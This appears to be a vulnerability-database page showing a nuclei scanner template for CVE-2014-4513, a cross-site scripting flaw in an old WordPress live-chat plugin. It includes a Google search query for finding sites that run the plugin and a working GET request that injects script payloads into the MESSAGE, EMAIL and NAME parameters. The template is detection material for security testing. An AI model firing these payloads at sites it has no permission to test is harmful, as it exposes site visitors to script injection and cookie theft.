Lucene search
K

ActiveHelper LiveHelp Server 3.1.0 - Cross-Site Scripting

🗓️ 17 Jun 2026 05:14:44Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 19 Views

ActiveHelper LiveHelp Server 3.1.0 - XSS vulnerability in WordPress plugi

Related
Refs
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2014-4513
1 Jul 201414:00
cve
Cvelist
CVE-2014-4513
1 Jul 201414:00
cvelist
EUVD
EUVD-2014-4440
7 Oct 202500:30
euvd
NVD
CVE-2014-4513
1 Jul 201414:55
nvd
OpenVAS
WordPress ActiveHelper LiveHelp Live Chat Plugin Cross Site Scripting Vulnerability
21 Jul 201400:00
openvas
Patchstack
WordPress ActiveHelper LiveHelp Plugin <= 3.1.0 - Multiple XSS
23 Jun 201400:00
patchstack
Prion
Cross site scripting
1 Jul 201414:55
prion
WPVulnDB
ActiveHelper LiveHelp Server 3.1.0 - server/offline.php Multiple Parameter XSS
20 Sep 201420:01
wpvulndb
id: CVE-2014-4513

info:
  name: ActiveHelper LiveHelp Server 3.1.0 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: Multiple cross-site scripting vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
  remediation: |
    Upgrade to a patched version of ActiveHelper LiveHelp Server or apply the necessary security patches to mitigate the XSS vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2014-4513
    - http://codevigilant.com/disclosure/wp-plugin-activehelper-livehelp-a3-cross-site-scripting-xss
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2014-4513
    cwe-id: CWE-79
    epss-score: 0.04513
    epss-percentile: 0.90273
    cpe: cpe:2.3:a:activehelper:activehelper_livehelp_live_chat:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: activehelper
    product: "activehelper_livehelp_live_chat"
    framework: wordpress
    google-query: "inurl:\"/wp-content/plugins/activehelper-livehelp\""
  tags: cve2014,cve,wordpress,xss,wp-plugin,activehelper,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/activehelper-livehelp/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'ActiveHelper LiveHelp Live Chat'

  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</textarea></script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100bdcf8f943485f58069a6b112ad855c0cdaf89a91c2d9afd154d1f82312bc5c5b022100e3d9a5ef56ad38c6911c6ebdf299e00ec329ad9cb01fab19f880f46c8b953e88:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 24.3
EPSS0.04513
19